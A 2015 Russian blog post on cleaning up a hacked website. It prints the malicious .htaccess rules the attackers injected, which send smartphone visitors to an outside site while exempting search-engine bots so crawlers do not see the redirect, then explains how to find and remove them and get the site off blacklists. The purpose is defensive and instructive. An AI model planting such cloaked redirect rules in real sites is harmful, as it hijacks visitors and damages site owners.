29.03.2015
Категории: Исследования

Ваш сайт взломали! Как найти и устранить беду

Итак, что мы имеем?

В поиске Яндекса этому сайту стала приписываться вот такая надпись:

Сайт может угрожать безопасности вашего компьютера или мобильного устройства

При переходе на сайт ничего страшного не происходит. Это потому что вирус или скорее дор ориентирован на мобильные устройства и планшеты. И если зайти на сайт с какого нибудь смартфона, то вас перекинут на какой-то левый сайт, в данном случае, это сайт onlineg4.net.

Вот такой код залили злоумышленники в файлик .htaccess на хостинге:

RewriteCond   %{HTTP_USER_AGENT} (android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone) [NC]

RewriteCond   %{HTTP_USER_AGENT} !(accoona | ia_archiver | antabot | ask\ jeeves | baidu | dcpbot | eltaindexer | feedfetcher | gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo!\ slurp | mmcrawler | yandexbot | yandeximages | yandexvideo | yandexmedia | yandexblogs | yandexaddurl |
yandexfavicons | yandexdirect | yandexmetrika | yandexcatalog | yandexnews | yandeximageresizer)   [NC]

RewriteRule   (.*)   http://onlineg4.net/u/9024   [L,R=302]

Тут не сложно было догадаться и найти его, как правило такой вредоносный редирект ставят в начале файла. Его можно с легкостью удалить и писать в Яндекс о том, что теперь с сайтом все в порядке и его стоит исключить из черного списка.

Более того, хочу сказать, что если у вас или ваших посетителей будет установлен антивирус Касперского, то ваш сайт еще поместят в черный список баз Касперского. После очистки сайта стоит еще писать в тех.поддержку Касперского с просьбой удалить сайт из их черного списка, а то пользователи никогда не попадут на ваш сайт.

Вот такой вот случай произошел, скажу он не редкость и, как правило, его легко устранить. Достаточно элементарных знаний кода:

  • просматриваем файлик .htaccess, который лежит в корне вашего сайта;
  • ищем в нем, как правило в начале, домен какого-то левого сайта, к которому вы не имеете отношения;
  • ищем слова похожие на android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone, то есть это с каких операционных систем люди будут перенаправляться на левый сайт;
  • ищем название ботов gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo;
  • и самое последнее, ищем 302 редирект, потому что ставят именно его, не знаю с чем это связано, может они верят, что 302 редирект — это временный редирект.

Вот так можно выявить взлом сайта. Удачи и защищайте свои сайты от коварных злоумышленников.

Рекомендую почитать

Ужасный контент – маркетинг в действии... Привет, друзья, сегодня на почту мне пришло письмо с предложением услуг контент-маркетинга за 3500 рублей, я стал копать и вот, что из этого вышло ...
Анализ конкурента официального сайта госорганов... Привет, друзья! Сегодня меня попросили проанализировать сайт официального представительства государственного органа по вопросам миграции. Но это оказа...
Финал сотрудничества с Payperprofits... Привет, друзья! Если хотите узнать, чем завершилось мое сотрудничество, точнее обсуждение возможного сотрудничества с компанией Payperprofits читайте ...
Как увести клиента сеошнику... Привет, друзья! Сегодня попробуем разобраться почему одни сеошники уводят клиентов у других.А среди веб-студий вообще царит дикая вакханалия – каждая ...
Вся правда о вреде гамбургеров из Макдональдса рас... Не так давно один из шеф-поваров Джейми Оливер разоблачил Макдональдс, показав всем из чего на самом деле делают гамбургеры, после чего одна из крупне...

Хотите получать
мои статьи
почтой?

Адреса электронной почты не разглашаются и не предоставляются третьим лицам для коммерческого или некоммерческого использования.